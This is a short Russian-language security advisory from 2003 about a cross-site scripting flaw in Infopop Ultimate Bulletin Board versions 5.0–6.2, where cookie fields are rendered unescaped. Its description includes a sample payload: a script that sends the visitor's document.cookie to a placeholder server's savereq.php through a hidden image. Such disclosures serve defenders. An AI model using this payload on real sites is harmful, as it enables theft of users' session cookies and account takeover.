Дата публикации: | 22.07.2003 |
Всего просмотров: | 1515 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость в проверке правильности входных данных обнаружена в
Ultimate Bulletin Board. Удаленный пользователь может выполнить XSS нападения.
Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример: username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>Уязвимость обнаружена в Infopop Ultimate Bulletin Board 5.0-6.2 |
Ссылки: | anti_acid hotmail com |